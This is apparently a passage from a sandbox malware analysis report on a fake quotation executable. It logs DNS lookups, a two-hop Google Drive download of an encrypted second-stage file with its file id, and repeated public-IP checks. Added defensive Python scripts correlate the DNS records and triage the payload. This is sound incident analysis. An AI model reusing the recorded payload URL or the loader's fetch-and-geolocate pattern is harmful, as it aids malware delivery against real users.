Jul 24, 2024 14:45:23.452994108 CEST | 1.1.1.1 | 192.168.11.20 | 0x9de4 | No error (0) | drive.google.com | | 142.251.167.139 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:45:23.452994108 CEST | 1.1.1.1 | 192.168.11.20 | 0x9de4 | No error (0) | drive.google.com | | 142.251.167.100 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:45:24.126194000 CEST | 1.1.1.1 | 192.168.11.20 | 0x769c | No error (0) | drive.usercontent.google.com | | 142.251.111.132 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:45:27.376019955 CEST | 1.1.1.1 | 192.168.11.20 | 0xe37f | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 24, 2024 14:45:27.376019955 CEST | 1.1.1.1 | 192.168.11.20 | 0xe37f | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:45:27.376019955 CEST | 1.1.1.1 | 192.168.11.20 | 0xe37f | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:45:27.376019955 CEST | 1.1.1.1 | 192.168.11.20 | 0xe37f | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:45:27.376019955 CEST | 1.1.1.1 | 192.168.11.20 | 0xe37f | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:45:27.376019955 CEST | 1.1.1.1 | 192.168.11.20 | 0xe37f | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:45:28.537071943 CEST | 1.1.1.1 | 192.168.11.20 | 0xd26b | No error (0) | reallyfreegeoip.org | | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Jul 24, 2024 14:45:28.537071943 CEST | 1.1.1.1 | 192.168.11.20 | 0xd26b | No error (0) | reallyfreegeoip.org | | 104.21.67.152 | A (IP address) | IN (0x0001) | false
                                                                              • drive.google.com
                                                                              • drive.usercontent.google.com
                                                                              • reallyfreegeoip.org
                                                                              • checkip.dyndns.org
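The DNS tables above only make sense when read together: the answer rows for transaction 0xe37f hand back a CNAME to checkip.dyndns.com and then A records owned by that canonical name, and the TCP packet list shows the sample connecting to one of those addresses (158.101.44.242:80) and to one of the reallyfreegeoip.org addresses (172.67.177.134:443), which is what an external IP / geolocation check looks like on the wire. The Python below is added here as an example and is not part of the Joe Sandbox report: it joins the query and answer rows by transaction ID, follows the CNAME chain, labels the TCP destinations with the name that produced them, and flags the IP-lookup services. The record lists are transcribed from the tables above; the IP_LOOKUP_SERVICES watch list is an assumption.

```python
"""Correlate the DNS query and answer rows of the report by transaction ID,
follow CNAME chains, and flag resolutions of public IP-lookup services.

Added example, not part of the Joe Sandbox report.  QUERIES, ANSWERS and
CONNECTIONS are transcribed from the tables above; IP_LOOKUP_SERVICES is an
assumption (the two services this sample used plus common alternatives)."""
from collections import defaultdict

# (transaction id, queried name) -- transcribed from the DNS queries table
QUERIES = [
    ("0x9de4", "drive.google.com"),
    ("0x769c", "drive.usercontent.google.com"),
    ("0xe37f", "checkip.dyndns.org"),
    ("0xd26b", "reallyfreegeoip.org"),
]

# (transaction id, owner name, type, rdata) -- transcribed from the DNS answers table
ANSWERS = [
    ("0x9de4", "drive.google.com", "A", "142.251.167.113"),
    ("0x9de4", "drive.google.com", "A", "142.251.167.101"),
    ("0x9de4", "drive.google.com", "A", "142.251.167.102"),
    ("0x9de4", "drive.google.com", "A", "142.251.167.138"),
    ("0x9de4", "drive.google.com", "A", "142.251.167.139"),
    ("0x9de4", "drive.google.com", "A", "142.251.167.100"),
    ("0x769c", "drive.usercontent.google.com", "A", "142.251.111.132"),
    ("0xe37f", "checkip.dyndns.org", "CNAME", "checkip.dyndns.com"),
    ("0xe37f", "checkip.dyndns.com", "A", "158.101.44.242"),
    ("0xe37f", "checkip.dyndns.com", "A", "193.122.6.168"),
    ("0xe37f", "checkip.dyndns.com", "A", "193.122.130.0"),
    ("0xe37f", "checkip.dyndns.com", "A", "132.226.247.73"),
    ("0xe37f", "checkip.dyndns.com", "A", "132.226.8.169"),
    ("0xd26b", "reallyfreegeoip.org", "A", "172.67.177.134"),
    ("0xd26b", "reallyfreegeoip.org", "A", "104.21.67.152"),
]

# (src ip, src port, dst ip, dst port) -- the two non-Google TCP destinations
# in the packet list above
CONNECTIONS = [
    ("192.168.11.20", 49789, "172.67.177.134", 443),
    ("192.168.11.20", 49781, "158.101.44.242", 80),
]

# Assumption: services whose only purpose is to tell a client its public IP
# or country.  Extend from your own threat intel.
IP_LOOKUP_SERVICES = {"checkip.dyndns.org", "reallyfreegeoip.org",
                      "api.ipify.org", "ip-api.com", "ipinfo.io"}


def resolve(queries, answers):
    """Map each queried name to the sorted A addresses it ultimately resolves to.

    Answers are matched to queries by transaction ID (a resolver would also
    check the source port).  CNAME records are followed so that an A record
    owned by the canonical name (checkip.dyndns.com) is credited to the name
    the sample actually asked for (checkip.dyndns.org)."""
    by_txid = defaultdict(list)
    for txid, owner, rtype, rdata in answers:
        by_txid[txid].append((owner, rtype, rdata))
    resolved = {}
    for txid, qname in queries:
        rrs = by_txid.get(txid, [])
        names = {qname}
        grown = True
        while grown:  # follow CNAME chains of any length
            grown = False
            for owner, rtype, rdata in rrs:
                if rtype == "CNAME" and owner in names and rdata not in names:
                    names.add(rdata)
                    grown = True
        resolved[qname] = sorted(rdata for owner, rtype, rdata in rrs
                                 if rtype == "A" and owner in names)
    return resolved


def flag_ip_lookups(resolved, watchlist=IP_LOOKUP_SERVICES):
    """Names from the watch list that the sample actually resolved."""
    return {name: addrs for name, addrs in resolved.items() if name in watchlist}


def attribute_connections(connections, resolved):
    """Label each TCP destination with the DNS name that produced its address,
    so the 158.101.44.242:80 session can be read as checkip.dyndns.org."""
    addr_to_name = {addr: name for name, addrs in resolved.items() for addr in addrs}
    return {f"{dst}:{dport}": addr_to_name.get(dst)
            for _src, _sport, dst, dport in connections}


if __name__ == "__main__":
    table = resolve(QUERIES, ANSWERS)
    for name, addrs in flag_ip_lookups(table).items():
        print(f"IP-lookup service resolved: {name} -> {', '.join(addrs)}")
    for dst, name in attribute_connections(CONNECTIONS, table).items():
        print(f"connection to {dst} = {name}")
```

Matching on transaction ID alone is enough for a report like this one, where every query has exactly one response; on a live capture add the UDP port pair from the packet list as a second key so a spoofed or late answer cannot be credited to the wrong query.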
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49781 | 158.101.44.242 | 80 | 5668 | C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
Timestamp | Bytes transferred | Direction | Data
Jul 24, 2024 14:45:27.543334007 CEST | 151 | OUT | GET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
                                                                              Connection: Keep-Alive
Jul 24, 2024 14:45:27.810448885 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:27 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 5eaf97d2b706d14ea2e9d9f927cf1b99
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>
Jul 24, 2024 14:45:27.814985991 CEST | 127 | OUT | GET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
Jul 24, 2024 14:45:27.983994961 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:27 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 517c56619fd97e96cff2f3d182ce7325
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>
Jul 24, 2024 14:45:29.384762049 CEST | 127 | OUT | GET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
Jul 24, 2024 14:45:29.548726082 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:29 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: c7a70b022987a04ba89d234d54fffead
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>
Jul 24, 2024 14:45:30.377794981 CEST | 127 | OUT | GET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
Jul 24, 2024 14:45:30.541811943 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:30 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 80a6ad060b2f17f4282b1906a507e987
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>
Jul 24, 2024 14:45:31.056204081 CEST | 127 | OUT | GET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
Jul 24, 2024 14:45:31.219908953 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:31 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 9d50342dc51e3fc0712c6352284c5132
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>
Jul 24, 2024 14:45:31.747342110 CEST | 127 | OUT | GET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
Jul 24, 2024 14:45:31.945415020 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:31 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 118a8c9d39e699494e5d1932f39252dc
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>
Jul 24, 2024 14:45:32.452363968 CEST | 127 | OUT | GET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
Jul 24, 2024 14:45:32.617572069 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:32 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 164291d257b80453266feba32ac3181e
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>
Jul 24, 2024 14:45:33.123032093 CEST | 127 | OUT | GET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
Jul 24, 2024 14:45:33.288347006 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:33 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 8864eba5e92e6bd5b776d863041b9346
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>
Jul 24, 2024 14:45:33.806164026 CEST | 127 | OUT | GET / HTTP/1.1
                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                              Host: checkip.dyndns.org
Jul 24, 2024 14:45:33.970061064 CEST | 322 | IN | HTTP/1.1 200 OK
                                                                              Date: Wed, 24 Jul 2024 12:45:33 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 105
                                                                              Connection: keep-alive
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              X-Request-ID: 2b538810d5a8f422b95769194d70c9a1
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 34 39 2e 31 38 2e 32 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 149.18.24.104</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49779 | 142.251.167.113 | 443 | 5668 | C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-24 12:45:23 UTC | 216 | OUT | GET /uc?export=download&id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Host: drive.google.com
                                                                              Cache-Control: no-cache
2024-07-24 12:45:23 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                              Content-Type: application/binary
                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                              Pragma: no-cache
                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                              Date: Wed, 24 Jul 2024 12:45:23 GMT
                                                                              Location: https://drive.usercontent.google.com/download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                              Content-Security-Policy: script-src 'nonce-lfnz482hWwVc7Vja9_G3kQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                              Server: ESF
                                                                              Content-Length: 0
                                                                              X-XSS-Protection: 0
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              X-Content-Type-Options: nosniff
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close
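The Drive fetch is a two-hop download: the 303 above sends the client from drive.google.com/uc?export=download to drive.usercontent.google.com/download with the same file id, and the second session (below) returns a 133696-byte attachment named LfCKiMaukAnpNnWD225.bin together with an X-Goog-Hash header carrying crc32c=O61pkQ==. When reproducing such a download from a capture, three checks are worth automating: extract the next hop and file id from the redirect, confirm that the body you hold matches the server's CRC-32C (Google sends it as base64 of the big-endian checksum), and decide whether the bytes are an executable in the clear or an opaque blob. The Python below is an added example, not part of the report. The 303 headers and the first 255 body bytes are transcribed from the two sessions; since the full file is not on the page, the checksum code is exercised with the standard CRC-32C test vector ("123456789"), and crc32c=O61pkQ== can only be verified against the complete file. On the transcribed prefix the body starts with ca 3a rather than MZ and is high-entropy, which is what an encrypted second stage looks like rather than a dropped executable.

```python
"""Follow a Google Drive redirect from a capture and triage what the second
hop delivers: next hop and file id from the 303, CRC-32C check against
X-Goog-Hash, and PE-vs-opaque-blob classification of the body.

Added example, not part of the Joe Sandbox report.  REDIRECT_303 and
BODY_PREFIX are transcribed from the two Drive sessions in this report; the
full 133696-byte file is not on the page, so the hash routine is exercised
with the published CRC-32C test vector instead."""
import base64
import math
import re
import struct
from collections import Counter

REDIRECT_303 = (
    "HTTP/1.1 303 See Other\r\n"
    "Content-Type: application/binary\r\n"
    "Location: https://drive.usercontent.google.com/download"
    "?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download\r\n"
    "Content-Length: 0\r\n"
    "Connection: close\r\n\r\n"
)
# First 255 bytes of LfCKiMaukAnpNnWD225.bin as shown in the report's first Data Raw row.
BODY_PREFIX = bytes.fromhex(
    "ca 3a 68 51 3a 4b 4a c0 68 06 55 94 b4 84 4d 8d 04 d1 de dc d9 01 f3 09 cb 68 e9 72 b4 e9 c2 4b "
    "b5 27 34 56 f9 ef c2 5a 3a de b8 25 7c 4d d4 81 9c 0f d2 eb 1a af 67 b0 57 b0 7c 79 91 b3 4b 7a "
    "89 1c 08 7f b3 0c 82 2a 02 41 b0 24 4f 25 84 ae cc 67 49 5c 4c f5 ea 6d e3 9f bb 9e 22 c6 a1 d2 "
    "66 67 44 a2 0d e9 6e d9 96 d7 67 7c 06 82 72 5f 3e 54 21 34 47 a1 23 e0 c0 b3 ee 1c 8b d5 c8 b3 "
    "16 9f 9c 5c 83 8e 20 d6 4a 6d 35 bf 93 dc 9b d2 24 c5 99 70 af 07 7a ce 06 ae f6 dd d1 9a 4d 22 "
    "62 01 eb c5 3d b3 68 68 a2 2e 64 33 22 0f 44 b0 59 59 85 f5 38 fe 2b 32 0b 61 90 98 08 bc 79 d8 "
    "e8 71 9c 3f 85 85 65 57 15 3d 80 3c f3 46 8b e7 ab ca 1c a6 6a d9 14 1c f1 2c 15 64 eb 33 02 15 "
    "ac f0 fa ea 32 65 ea 2b a2 d0 fb ac 68 5c e0 93 20 e8 11 13 de 18 eb d6 8e f1 d7 a7 60 71 2d"
)

DRIVE_FILE_ID = re.compile(r"[?&]id=([A-Za-z0-9_-]+)")
LOCATION = re.compile(r"^Location:[ \t]*(\S+)", re.IGNORECASE | re.MULTILINE)


def next_hop(raw_response):
    """For a 3xx response return (Location, Drive file id); otherwise (None, None)."""
    status_line = raw_response.split("\r\n", 1)[0]
    if not re.match(r"HTTP/1\.[01] 3\d\d", status_line):
        return None, None
    m = LOCATION.search(raw_response)
    location = m.group(1) if m else None
    fid = DRIVE_FILE_ID.search(location or "")
    return location, (fid.group(1) if fid else None)


# CRC-32C (Castagnoli), reflected polynomial 0x82F63B78, as used by Google Cloud Storage.
_CRC32C_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0x82F63B78 if _c & 1 else _c >> 1
    _CRC32C_TABLE.append(_c)


def crc32c(data):
    crc = 0xFFFFFFFF
    for b in data:
        crc = _CRC32C_TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)
    return crc ^ 0xFFFFFFFF


def crc32c_b64(data):
    """Encode as the download server does: base64 of the big-endian CRC-32C."""
    return base64.b64encode(struct.pack(">I", crc32c(data))).decode()


def verify_x_goog_hash(header_value, data):
    """True when the crc32c= entry of an X-Goog-Hash header matches the body."""
    entries = dict(e.strip().split("=", 1) for e in header_value.split(",") if "=" in e)
    return entries.get("crc32c") == crc32c_b64(data)


def shannon_entropy(data):
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def looks_like_pe(data):
    """MZ header plus a PE signature at e_lfanew; anything else is not a PE in the clear."""
    if data[:2] != b"MZ" or len(data) < 0x40:
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def triage(data, entropy_threshold=7.0):
    """Classify a body: a PE in the clear, or an opaque (encrypted/compressed)
    blob with no PE header and entropy near 8 bits/byte.  The threshold is an
    assumption; tune it on your own corpus."""
    entropy = shannon_entropy(data)
    is_pe = looks_like_pe(data)
    return {"size": len(data), "is_pe": is_pe, "entropy": round(entropy, 3),
            "opaque_blob": (not is_pe) and entropy >= entropy_threshold}


if __name__ == "__main__":
    print("next hop:", next_hop(REDIRECT_303))
    print("triage of transcribed prefix:", triage(BODY_PREFIX))
```

Treat a crc32c mismatch as "the capture or re-download is incomplete", not as evidence of tampering: the value is computed by the serving storage, so it tells you whether you hold the same bytes the sandbox received, which is what matters before spending time on the loader's decryption routine.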


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49780 | 142.251.111.132 | 443 | 5668 | C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-24 12:45:24 UTC | 258 | OUT | GET /download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Cache-Control: no-cache
                                                                              Host: drive.usercontent.google.com
                                                                              Connection: Keep-Alive
2024-07-24 12:45:26 UTC | 4863 | IN | HTTP/1.1 200 OK
                                                                              Content-Type: application/octet-stream
                                                                              Content-Security-Policy: sandbox
                                                                              Content-Security-Policy: default-src 'none'
                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                              X-Content-Security-Policy: sandbox
                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                              Cross-Origin-Resource-Policy: same-site
                                                                              X-Content-Type-Options: nosniff
                                                                              Content-Disposition: attachment; filename="LfCKiMaukAnpNnWD225.bin"
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Credentials: false
                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 133696
                                                                              Last-Modified: Tue, 16 Jul 2024 08:16:11 GMT
                                                                              X-GUploader-UploadID: AHxI1nNLJQ9oW_ul51xwr9LvJbaFgviq37SYDeNTUwDuwTo4vQw0S1-1HC6aIXcAUvSwAGdZKCETSP3fKg
                                                                              Date: Wed, 24 Jul 2024 12:45:26 GMT
                                                                              Expires: Wed, 24 Jul 2024 12:45:26 GMT
                                                                              Cache-Control: private, max-age=0
                                                                              X-Goog-Hash: crc32c=O61pkQ==
                                                                              Server: UploadServer
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close
